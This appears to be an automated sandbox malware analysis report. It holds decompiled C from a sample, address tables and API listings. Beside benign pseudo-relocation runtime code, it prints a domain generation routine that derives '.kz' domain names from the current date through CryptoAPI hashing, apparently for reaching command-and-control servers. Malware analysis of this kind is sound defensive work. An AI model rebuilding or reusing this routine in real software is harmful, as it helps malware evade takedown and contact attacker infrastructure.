                                                                                                                                                                                                                                                                          				int _t94;
                                                                                                                                                                                                                                                                          				intOrPtr _t96;
                                                                                                                                                                                                                                                                          				signed int _t112;
                                                                                                                                                                                                                                                                          				void** _t120;
                                                                                                                                                                                                                                                                          				intOrPtr _t121;
                                                                                                                                                                                                                                                                          				signed int _t126;
                                                                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                                                                          				char _t145;
                                                                                                                                                                                                                                                                          				char** _t150;
                                                                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                                                                          				intOrPtr* _t153;
                                                                                                                                                                                                                                                                          				char** _t154;
                                                                                                                                                                                                                                                                          				char** _t155;
                                                                                                                                                                                                                                                                          				char** _t162;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t122 = __edi;
                                                                                                                                                                                                                                                                          				_t106 = __edx;
                                                                                                                                                                                                                                                                          				_t55 = __eax;
                                                                                                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                                                                                                          				_t153 = _t152 - 0x4c;
                                                                                                                                                                                                                                                                          				_t85 = __eax;
                                                                                                                                                                                                                                                                          				_t141 = __edx;
                                                                                                                                                                                                                                                                          				if(__ecx != 0) {
                                                                                                                                                                                                                                                                          					_v84 = 0x1c;
                                                                                                                                                                                                                                                                          					_v88 =  &_v60;
                                                                                                                                                                                                                                                                          					 *_t153 = __eax;
                                                                                                                                                                                                                                                                          					_v64 = __ecx;
                                                                                                                                                                                                                                                                          					_t57 = VirtualQuery(??, ??, ??);
                                                                                                                                                                                                                                                                          					_t154 = _t153 - 0xc;
                                                                                                                                                                                                                                                                          					_t94 = _v64;
                                                                                                                                                                                                                                                                          					if(_t57 == 0) {
                                                                                                                                                                                                                                                                          						_v84 = _t85;
                                                                                                                                                                                                                                                                          						_v88 = 0x1c;
                                                                                                                                                                                                                                                                          						 *_t154 = "  VirtualQuery failed for %d bytes at address %p";
                                                                                                                                                                                                                                                                          						E00401DD0(_t85, _t94, _t106, __edi, _t141);
                                                                                                                                                                                                                                                                          						_t150 = _t154;
                                                                                                                                                                                                                                                                          						_push(__edi);
                                                                                                                                                                                                                                                                          						_push(_t141);
                                                                                                                                                                                                                                                                          						_push(_t85);
                                                                                                                                                                                                                                                                          						_t155 = _t154 - 0x2c;
                                                                                                                                                                                                                                                                          						_t59 =  *0x405040;
                                                                                                                                                                                                                                                                          						if(_t59 == 0) {
                                                                                                                                                                                                                                                                          							 *0x405040 = 1;
                                                                                                                                                                                                                                                                          							_t59 = 0;
                                                                                                                                                                                                                                                                          							if(0x404138 <= 7) {
                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_t87 = 0x404138;
                                                                                                                                                                                                                                                                          								if(0x404138 <= 0xb) {
                                                                                                                                                                                                                                                                          									L23:
                                                                                                                                                                                                                                                                          									_t106 =  *_t87;
                                                                                                                                                                                                                                                                          									if( *_t87 != 0) {
                                                                                                                                                                                                                                                                          										goto L17;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_t32 = _t87 + 4; // 0x0
                                                                                                                                                                                                                                                                          										_t59 =  *_t32;
                                                                                                                                                                                                                                                                          										if(_t59 != 0) {
                                                                                                                                                                                                                                                                          											goto L17;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											goto L25;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_t122 =  *0x404138; // 0x0
                                                                                                                                                                                                                                                                          									if(_t122 != 0) {
                                                                                                                                                                                                                                                                          										L17:
                                                                                                                                                                                                                                                                          										if(_t87 >= 0x404138) {
                                                                                                                                                                                                                                                                          											goto L11;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											do {
                                                                                                                                                                                                                                                                          												_t30 = _t87 + 4; // 0x0
                                                                                                                                                                                                                                                                          												_v40 =  *((intOrPtr*)( *_t30 + 0x400000)) +  *_t87;
                                                                                                                                                                                                                                                                          												_t63 = E00401E1C( *_t30 + 0x400000, _t87, 4,  &_v40,  &_v40, 0x400000);
                                                                                                                                                                                                                                                                          												_t87 = _t87 + 8;
                                                                                                                                                                                                                                                                          											} while (_t87 < 0x404138);
                                                                                                                                                                                                                                                                          											return _t63;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_t141 =  *0x40413c; // 0x0
                                                                                                                                                                                                                                                                          										if(_t141 == 0) {
                                                                                                                                                                                                                                                                          											_t94 =  *0x404140; // 0x0
                                                                                                                                                                                                                                                                          											if(_t94 != 0) {
                                                                                                                                                                                                                                                                          												L25:
                                                                                                                                                                                                                                                                          												_t33 = _t87 + 8; // 0x0
                                                                                                                                                                                                                                                                          												_t59 =  *_t33;
                                                                                                                                                                                                                                                                          												if(_t59 != 1) {
                                                                                                                                                                                                                                                                          													_v148 = _t59;
                                                                                                                                                                                                                                                                          													 *_t155 = "  Unknown pseudo relocation protocol version %d.\n";
                                                                                                                                                                                                                                                                          													E00401DD0(_t87, _t94, _t106, _t122, _t141);
                                                                                                                                                                                                                                                                          													_push(_t150);
                                                                                                                                                                                                                                                                          													_t66 =  *((intOrPtr*)( *0x403020));
                                                                                                                                                                                                                                                                          													while(_t66 != 0) {
                                                                                                                                                                                                                                                                          														 *_t66();
                                                                                                                                                                                                                                                                          														_t68 =  *0x403020;
                                                                                                                                                                                                                                                                          														 *0x403020 = _t68 + 4;
                                                                                                                                                                                                                                                                          														_t66 =  *((intOrPtr*)(_t68 + 4));
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													return _t66;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													_t89 = _t87 + 0xc;
                                                                                                                                                                                                                                                                          													if(_t89 < 0x404138) {
                                                                                                                                                                                                                                                                          														do {
                                                                                                                                                                                                                                                                          															_t34 = _t89 + 4; // 0x0
                                                                                                                                                                                                                                                                          															_t70 = 0x400000 +  *_t34;
                                                                                                                                                                                                                                                                          															_t96 =  *_t89;
                                                                                                                                                                                                                                                                          															_t35 = _t96 + 0x400000; // 0x905a4d
                                                                                                                                                                                                                                                                          															_t145 =  *_t35;
                                                                                                                                                                                                                                                                          															_t36 = _t89 + 8; // 0x0
                                                                                                                                                                                                                                                                          															_t112 =  *_t36 & 0x000000ff;
                                                                                                                                                                                                                                                                          															if(_t112 == 0x10) {
                                                                                                                                                                                                                                                                          																_t126 =  *0x400000 & 0x0000ffff;
                                                                                                                                                                                                                                                                          																if((_t126 & 0x00008000) != 0) {
                                                                                                                                                                                                                                                                          																	_t122 = (_t126 | 0xffff0000) - _t96 - 0x400000;
                                                                                                                                                                                                                                                                          																	_v36 = _t145;
                                                                                                                                                                                                                                                                          																	goto L43;
                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                          																	goto L34;
                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                          																if(_t112 == 0x20) {
                                                                                                                                                                                                                                                                          																	_v36 =  *0x400000 - _t96 - 0x400000 + _t145;
                                                                                                                                                                                                                                                                          																	goto L39;
                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                          																	if(_t112 != 8) {
                                                                                                                                                                                                                                                                          																		_v36 = 0;
                                                                                                                                                                                                                                                                          																		_v148 = _t112;
                                                                                                                                                                                                                                                                          																		 *_t155 = "  Unknown pseudo relocation bit size %d.\n";
                                                                                                                                                                                                                                                                          																		_t70 = E00401DD0(_t89, _t96, _t112, _t122, _t145);
                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                          																	_t126 =  *_t70 & 0x000000ff;
                                                                                                                                                                                                                                                                          																	if((_t126 & 0x00000080) == 0) {
                                                                                                                                                                                                                                                                          																		L34:
                                                                                                                                                                                                                                                                          																		_t122 = _t126 - _t96;
                                                                                                                                                                                                                                                                          																		_v36 = _t126 - _t96 - 0x400000 + _t145;
                                                                                                                                                                                                                                                                          																		if(_t112 == 0x10) {
                                                                                                                                                                                                                                                                          																			L43:
                                                                                                                                                                                                                                                                          																			E00401E1C(_t70, _t89, 2,  &_v36, _t122, _t145);
                                                                                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                                                                                          																			if(_t112 == 0x20) {
                                                                                                                                                                                                                                                                          																				L39:
                                                                                                                                                                                                                                                                          																				E00401E1C(_t70, _t89, 4,  &_v36, _t122, _t145);
                                                                                                                                                                                                                                                                          																			} else {
                                                                                                                                                                                                                                                                          																				if(_t112 == 8) {
                                                                                                                                                                                                                                                                          																					goto L37;
                                                                                                                                                                                                                                                                          																				}
                                                                                                                                                                                                                                                                          																			}
                                                                                                                                                                                                                                                                          																		}
                                                                                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                                                                                          																		_t122 = (_t126 | 0xffffff00) - _t96 - 0x400000;
                                                                                                                                                                                                                                                                          																		_v36 = _t145;
                                                                                                                                                                                                                                                                          																		L37:
                                                                                                                                                                                                                                                                          																		E00401E1C(_t70, _t89, 1,  &_v36, _t122, _t145);
                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															_t89 = _t89 + 0xc;
                                                                                                                                                                                                                                                                          															_t59 = 0x404138;
                                                                                                                                                                                                                                                                          														} while (0x404138 > _t89);
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													goto L11;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                          												_t87 = 0x404144;
                                                                                                                                                                                                                                                                          												goto L23;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											goto L17;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                          							return _t59;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t74 = _v40;
                                                                                                                                                                                                                                                                          						if(_t74 == 0x40 || _t74 == 4) {
                                                                                                                                                                                                                                                                          							return memcpy(_t85, _t141, _t94);
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_t120 =  &_v32;
                                                                                                                                                                                                                                                                          							_v80 = _t120;
                                                                                                                                                                                                                                                                          							_v84 = 0x40;
                                                                                                                                                                                                                                                                          							_v88 = _v48;
                                                                                                                                                                                                                                                                          							 *_t154 = _v60;
                                                                                                                                                                                                                                                                          							_v68 = _t120;
                                                                                                                                                                                                                                                                          							_v64 = _t94;
                                                                                                                                                                                                                                                                          							VirtualProtect(??, ??, ??, ??);
                                                                                                                                                                                                                                                                          							_t55 = memcpy(_t85, _t141, _v64);
                                                                                                                                                                                                                                                                          							_t162 = _t154 - 0x10 + 0xc;
                                                                                                                                                                                                                                                                          							_t121 = _v68;
                                                                                                                                                                                                                                                                          							if(_t55 == 0x40 || _t55 == 4) {
                                                                                                                                                                                                                                                                          								goto L1;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v80 = _t121;
                                                                                                                                                                                                                                                                          								_v84 = _v32;
                                                                                                                                                                                                                                                                          								_v88 = _v48;
                                                                                                                                                                                                                                                                          								 *_t162 = _v60;
                                                                                                                                                                                                                                                                          								return VirtualProtect(??, ??, ??, ??);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					L1:
                                                                                                                                                                                                                                                                          					return _t55;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}








































                                                                                                                                                                                                                                                                          0x00401e1c
                                                                                                                                                                                                                                                                          0x00401e1c
                                                                                                                                                                                                                                                                          0x00401e1c
                                                                                                                                                                                                                                                                          0x00401e1f
                                                                                                                                                                                                                                                                          0x00401e20
                                                                                                                                                                                                                                                                          0x00401e21
                                                                                                                                                                                                                                                                          0x00401e22
                                                                                                                                                                                                                                                                          0x00401e25
                                                                                                                                                                                                                                                                          0x00401e27
                                                                                                                                                                                                                                                                          0x00401e2b
                                                                                                                                                                                                                                                                          0x00401e38
                                                                                                                                                                                                                                                                          0x00401e43
                                                                                                                                                                                                                                                                          0x00401e47
                                                                                                                                                                                                                                                                          0x00401e4a
                                                                                                                                                                                                                                                                          0x00401e4d
                                                                                                                                                                                                                                                                          0x00401e52
                                                                                                                                                                                                                                                                          0x00401e57
                                                                                                                                                                                                                                                                          0x00401e5a
                                                                                                                                                                                                                                                                          0x00401ee8
                                                                                                                                                                                                                                                                          0x00401eec
                                                                                                                                                                                                                                                                          0x00401ef4
                                                                                                                                                                                                                                                                          0x00401efb
                                                                                                                                                                                                                                                                          0x00401f01
                                                                                                                                                                                                                                                                          0x00401f03
                                                                                                                                                                                                                                                                          0x00401f04
                                                                                                                                                                                                                                                                          0x00401f05
                                                                                                                                                                                                                                                                          0x00401f06
                                                                                                                                                                                                                                                                          0x00401f09
                                                                                                                                                                                                                                                                          0x00401f10
                                                                                                                                                                                                                                                                          0x00401f1c
                                                                                                                                                                                                                                                                          0x00401f2b
                                                                                                                                                                                                                                                                          0x00401f33
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401f35
                                                                                                                                                                                                                                                                          0x00401f35
                                                                                                                                                                                                                                                                          0x00401f3d
                                                                                                                                                                                                                                                                          0x00401fa0
                                                                                                                                                                                                                                                                          0x00401fa0
                                                                                                                                                                                                                                                                          0x00401fa4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                                                                                                          0x00401fab
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401fab
                                                                                                                                                                                                                                                                          0x00401f3f
                                                                                                                                                                                                                                                                          0x00401f3f
                                                                                                                                                                                                                                                                          0x00401f47
                                                                                                                                                                                                                                                                          0x00401f54
                                                                                                                                                                                                                                                                          0x00401f5a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401f5c
                                                                                                                                                                                                                                                                          0x00401f64
                                                                                                                                                                                                                                                                          0x00401f64
                                                                                                                                                                                                                                                                          0x00401f6d
                                                                                                                                                                                                                                                                          0x00401f77
                                                                                                                                                                                                                                                                          0x00401f7c
                                                                                                                                                                                                                                                                          0x00401f7f
                                                                                                                                                                                                                                                                          0x00401f8e
                                                                                                                                                                                                                                                                          0x00401f8e
                                                                                                                                                                                                                                                                          0x00401f49
                                                                                                                                                                                                                                                                          0x00401f49
                                                                                                                                                                                                                                                                          0x00401f51
                                                                                                                                                                                                                                                                          0x00401f90
                                                                                                                                                                                                                                                                          0x00401f98
                                                                                                                                                                                                                                                                          0x00401fad
                                                                                                                                                                                                                                                                          0x00401fad
                                                                                                                                                                                                                                                                          0x00401fad
                                                                                                                                                                                                                                                                          0x00401fb3
                                                                                                                                                                                                                                                                          0x004020bb
                                                                                                                                                                                                                                                                          0x004020bf
                                                                                                                                                                                                                                                                          0x004020c6
                                                                                                                                                                                                                                                                          0x004020cc
                                                                                                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                                                                                                          0x004020db
                                                                                                                                                                                                                                                                          0x004020e0
                                                                                                                                                                                                                                                                          0x004020e2
                                                                                                                                                                                                                                                                          0x004020ea
                                                                                                                                                                                                                                                                          0x004020f0
                                                                                                                                                                                                                                                                          0x004020f3
                                                                                                                                                                                                                                                                          0x004020f8
                                                                                                                                                                                                                                                                          0x00401fb9
                                                                                                                                                                                                                                                                          0x00401fb9
                                                                                                                                                                                                                                                                          0x00401fc2
                                                                                                                                                                                                                                                                          0x00401fc8
                                                                                                                                                                                                                                                                          0x00401fcd
                                                                                                                                                                                                                                                                          0x00401fcd
                                                                                                                                                                                                                                                                          0x00401fd0
                                                                                                                                                                                                                                                                          0x00401fd2
                                                                                                                                                                                                                                                                          0x00401fd2
                                                                                                                                                                                                                                                                          0x00401fd8
                                                                                                                                                                                                                                                                          0x00401fdb
                                                                                                                                                                                                                                                                          0x00401fe4
                                                                                                                                                                                                                                                                          0x0040202c
                                                                                                                                                                                                                                                                          0x00402035
                                                                                                                                                                                                                                                                          0x004020a0
                                                                                                                                                                                                                                                                          0x004020a9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401fe6
                                                                                                                                                                                                                                                                          0x00401fe9
                                                                                                                                                                                                                                                                          0x00402070
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401feb
                                                                                                                                                                                                                                                                          0x00401fee
                                                                                                                                                                                                                                                                          0x00401ff0
                                                                                                                                                                                                                                                                          0x00401ff7
                                                                                                                                                                                                                                                                          0x00401ffb
                                                                                                                                                                                                                                                                          0x00402002
                                                                                                                                                                                                                                                                          0x00402002
                                                                                                                                                                                                                                                                          0x00402008
                                                                                                                                                                                                                                                                          0x00402011
                                                                                                                                                                                                                                                                          0x00402037
                                                                                                                                                                                                                                                                          0x00402037
                                                                                                                                                                                                                                                                          0x00402043
                                                                                                                                                                                                                                                                          0x00402049
                                                                                                                                                                                                                                                                          0x004020ac
                                                                                                                                                                                                                                                                          0x004020b4
                                                                                                                                                                                                                                                                          0x0040204b
                                                                                                                                                                                                                                                                          0x0040204e
                                                                                                                                                                                                                                                                          0x00402073
                                                                                                                                                                                                                                                                          0x0040207b
                                                                                                                                                                                                                                                                          0x00402050
                                                                                                                                                                                                                                                                          0x00402053
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00402053
                                                                                                                                                                                                                                                                          0x0040204e
                                                                                                                                                                                                                                                                          0x00402013
                                                                                                                                                                                                                                                                          0x0040201b
                                                                                                                                                                                                                                                                          0x00402024
                                                                                                                                                                                                                                                                          0x00402055
                                                                                                                                                                                                                                                                          0x0040205d
                                                                                                                                                                                                                                                                          0x0040205d
                                                                                                                                                                                                                                                                          0x00402011
                                                                                                                                                                                                                                                                          0x00401fe9
                                                                                                                                                                                                                                                                          0x00402080
                                                                                                                                                                                                                                                                          0x00402083
                                                                                                                                                                                                                                                                          0x00402088
                                                                                                                                                                                                                                                                          0x00402090
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401fc2
                                                                                                                                                                                                                                                                          0x00401f9a
                                                                                                                                                                                                                                                                          0x00401f9a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401f9a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401f51
                                                                                                                                                                                                                                                                          0x00401f47
                                                                                                                                                                                                                                                                          0x00401f3d
                                                                                                                                                                                                                                                                          0x00401f12
                                                                                                                                                                                                                                                                          0x00401f12
                                                                                                                                                                                                                                                                          0x00401f19
                                                                                                                                                                                                                                                                          0x00401f19
                                                                                                                                                                                                                                                                          0x00401e60
                                                                                                                                                                                                                                                                          0x00401e60
                                                                                                                                                                                                                                                                          0x00401e66
                                                                                                                                                                                                                                                                          0x00401ee7
                                                                                                                                                                                                                                                                          0x00401e6d
                                                                                                                                                                                                                                                                          0x00401e6d
                                                                                                                                                                                                                                                                          0x00401e70
                                                                                                                                                                                                                                                                          0x00401e74
                                                                                                                                                                                                                                                                          0x00401e7f
                                                                                                                                                                                                                                                                          0x00401e86
                                                                                                                                                                                                                                                                          0x00401e89
                                                                                                                                                                                                                                                                          0x00401e8c
                                                                                                                                                                                                                                                                          0x00401e8f
                                                                                                                                                                                                                                                                          0x00401e9f
                                                                                                                                                                                                                                                                          0x00401e9f
                                                                                                                                                                                                                                                                          0x00401ea4
                                                                                                                                                                                                                                                                          0x00401ea7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00401eb2
                                                                                                                                                                                                                                                                          0x00401eb2
                                                                                                                                                                                                                                                                          0x00401eb9
                                                                                                                                                                                                                                                                          0x00401ec0
                                                                                                                                                                                                                                                                          0x00401ec7
                                                                                                                                                                                                                                                                          0x00401ed9
                                                                                                                                                                                                                                                                          0x00401ed9
                                                                                                                                                                                                                                                                          0x00401ea7
                                                                                                                                                                                                                                                                          0x00401e66
                                                                                                                                                                                                                                                                          0x00401e2d
                                                                                                                                                                                                                                                                          0x00401e2d
                                                                                                                                                                                                                                                                          0x00401e34
                                                                                                                                                                                                                                                                          0x00401e34

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$Protect$Query
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 3618607426-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: f09473ca4629ddbfdfb1bbf95e45a330cf630b9b0dbe34dad6cf56d79bdec4c4
                                                                                                                                                                                                                                                                          • Instruction ID: 06f0d9e29b35e3b38f917c532443f2a712c509407963492828fb5f3299beb3b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f09473ca4629ddbfdfb1bbf95e45a330cf630b9b0dbe34dad6cf56d79bdec4c4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1310BB5D04204AFDB14EFA9D48559EFBF4EB88354F10852EE958E3390E375D840CB96
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040092E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v28;
                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				char _v172;
                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                          					GetLocalTime( &_v28);
                                                                                                                                                                                                                                                                          					_t46 = E040097E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
                                                                                                                                                                                                                                                                          					_t84 = _t83 + 0xc;
                                                                                                                                                                                                                                                                          					_v12 = _t46 + _a12;
                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                          					while(_v32 < _a8) {
                                                                                                                                                                                                                                                                          						E04007D20( &_v172,  &_v172, 0, 0x80);
                                                                                                                                                                                                                                                                          						_t50 = E04008BB0( &_v12, 4,  &_v172, 0x80);
                                                                                                                                                                                                                                                                          						_t86 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                          						_v40 = _t50;
                                                                                                                                                                                                                                                                          						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                          							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v12 = _v172;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                          						E04009650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
                                                                                                                                                                                                                                                                          						_t84 = _t86 + 0x10;
                                                                                                                                                                                                                                                                          						lstrcatA(_v32 * 0x28 + _a4, ".kz");
                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x040092e9
                                                                                                                                                                                                                                                                          0x040092f4
                                                                                                                                                                                                                                                                          0x04009308
                                                                                                                                                                                                                                                                          0x0400931d
                                                                                                                                                                                                                                                                          0x04009322
                                                                                                                                                                                                                                                                          0x04009328
                                                                                                                                                                                                                                                                          0x0400932b
                                                                                                                                                                                                                                                                          0x0400933d
                                                                                                                                                                                                                                                                          0x04009357
                                                                                                                                                                                                                                                                          0x04009371
                                                                                                                                                                                                                                                                          0x04009376
                                                                                                                                                                                                                                                                          0x04009379
                                                                                                                                                                                                                                                                          0x04009380
                                                                                                                                                                                                                                                                          0x04009396
                                                                                                                                                                                                                                                                          0x04009382
                                                                                                                                                                                                                                                                          0x04009388
                                                                                                                                                                                                                                                                          0x04009388
                                                                                                                                                                                                                                                                          0x040093a8
                                                                                                                                                                                                                                                                          0x040093c4
                                                                                                                                                                                                                                                                          0x040093c9
                                                                                                                                                                                                                                                                          0x040093db
                                                                                                                                                                                                                                                                          0x040093e7
                                                                                                                                                                                                                                                                          0x040093f0
                                                                                                                                                                                                                                                                          0x0400933a
                                                                                                                                                                                                                                                                          0x0400933a
                                                                                                                                                                                                                                                                          0x0400933d
                                                                                                                                                                                                                                                                          0x040093fe

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04009308
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,.kz), ref: 040093DB
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
